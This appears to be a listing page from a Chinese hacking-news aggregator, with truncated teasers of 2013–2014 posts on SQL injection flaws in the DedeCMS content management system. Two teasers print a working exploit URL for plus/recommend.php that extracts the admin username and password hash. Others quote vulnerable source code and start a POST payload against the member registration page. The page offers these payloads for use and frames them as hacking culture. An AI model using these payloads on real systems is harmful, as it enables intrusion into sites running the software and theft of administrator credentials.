记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

DedeCMS recommend.php文件通杀SQL注入漏洞利用代码及工具

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:EXP:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%27%20or%20mid=@`%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%2
发布时间:2014-03-04 17:20 | 阅读:217153 | 评论:1 | 标签:实用工具 渗透测试 dedecms漏洞 注入 cms 漏洞

DedeCMS全版本通杀SQL注入漏洞利用代码及工具

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:EXP:Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]='  or mid=@`'` /*!50000union*//*!50000select*/1,2,3,(select  CONCAT(0x7c,userid,0x7c,pwd)+fro
发布时间:2014-02-28 12:40 | 阅读:115648 | 评论:0 | 标签:工具 漏洞 dedecms漏洞 注入 cms

DEDECMS 通杀鸡肋注入一枚附利用方法

  漏洞文件:/plus/feedback.php   if($comtype == 'comments') //问题从这里开始 { $arctitle = addslashes($title);//$title 是关键 没有初始化 addslashes转义了我们的$title 比如我们传入1' $arctitle=1' $typeid = intval($typeid); //这些都是打酱油的 $ischeck = intval($ischeck);//这些都是打酱油的 $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype); if($msg!='') //$msg 如
发布时间:2013-03-08 12:05 | 阅读:126627 | 评论:0 | 标签:代码审计 最新漏洞 dedecms漏洞 注入 cms

织梦CMS漏洞dedecms漏洞 2013-02-10 SQL注入漏洞

www.513xs.com/plus/search.php?keyword= 在 include/shopcar.class.php中 先看一下这个shopcar类是如何生成cookie的 239      function saveCookie($key,$value) 240      { 241          if(is_array($value)) 242          { 243              $value = $this->enCrypt($this->enCode($value)); 244          } 245          else 246          { 247              $value = $this->enCrypt(
发布时间:2013-02-13 05:35 | 阅读:143671 | 评论:0 | 标签:网络安全 dedecms漏洞

DedeCms SQL注射漏洞再利用

需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞. 原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码. 详细说明 跟这个漏洞 WooYun: Dedecms SQL注射导致审核机制绕过漏洞 是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的. POST提交以下数据,其实不用POST提交的,这样隐蔽点. http://www.site.com/member/reg_new.php POST数据 dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4r
发布时间:2013-01-17 17:20 | 阅读:130737 | 评论:0 | 标签:Vulndb Dedecms Dedecms漏洞 SQL注射

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云